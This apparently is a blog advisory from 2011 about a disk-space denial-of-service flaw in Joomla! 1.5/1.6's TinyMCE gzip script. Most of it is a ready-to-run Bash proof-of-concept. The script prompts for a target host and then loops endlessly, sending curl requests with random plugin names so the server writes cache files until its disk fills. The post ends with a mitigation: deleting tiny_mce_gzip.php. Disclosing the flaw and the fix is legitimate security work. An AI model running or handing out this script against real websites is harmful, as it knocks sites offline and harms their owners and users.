Joomla! TinyMCE DOS

Back in February, I reported an issue with TinyMCE to the Joomla! Security Strike Team. Since then, they "fixed" it in 1.6.1, but failed to do so for 1.5.23. Joomla! 1.5.x ships with a script that is supposed to cache gzipped copies of TinyMCE, but not only is this script never used, but it doesn't clean up after itself.

Without further ado, here is a POC Bash script that causes denial of service:

#!/bin/bash
# Exploit Title: Joomla! 1.5/1.6 TinyMCE Disk Space DOS
# Date: 25 February 2010
# Author: Jeff Channell
# Software Link: http://www.joomla.org

# header
clear
echo "###################################################"
echo "##  Joomla! 1.5.23/1.6.0 TinyMCE Disk Space DOS  ##"
echo "##       2011 jdc - for educational use only     ##"
echo "###################################################"
echo ""
echo -n "Host: http://"
read MCEDOS_JOOMLAHOST
echo ""
echo -n "1.5 Mode? y/n: "
read MCEDOS_OLDJOOMLA

MCEDOS_PART="media"
if [ "$MCEDOS_OLDJOOMLA" == "y" ]
then
	MCEDOS_PART="plugins"
fi

MCEDOS_USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
MCEDOS_ROOT_PATH="http://$MCEDOS_JOOMLAHOST/$MCEDOS_PART/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&compress=false&plugins="

echo ""
echo " * Filling up the drive of $MCEDOS_JOOMLAHOST ... Ctrl+C to quit"
echo ""
echo ""

while [ true ]; do
	MCEDOS_RANDOM=`date | md5sum | sed -e s/[^0-9a-f]//g`
	curl -H 'Accept-Encoding: gzip,deflate' -A "$MCEDOS_USERAGENT" "$MCEDOS_ROOT_PATH$MCEDOS_RANDOM" > /dev/null 2>&1 &
	echo -n "."
	sleep 1
done

Joomla! 1.5.x users can protect themselves by deleting plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php (thanks to Amy Stephen for the suggestion).

UPDATE: Those with shell but no shell-fu might find this helpful as well: find . -type f -name tiny_mce_gzip.php -exec rm {} \\;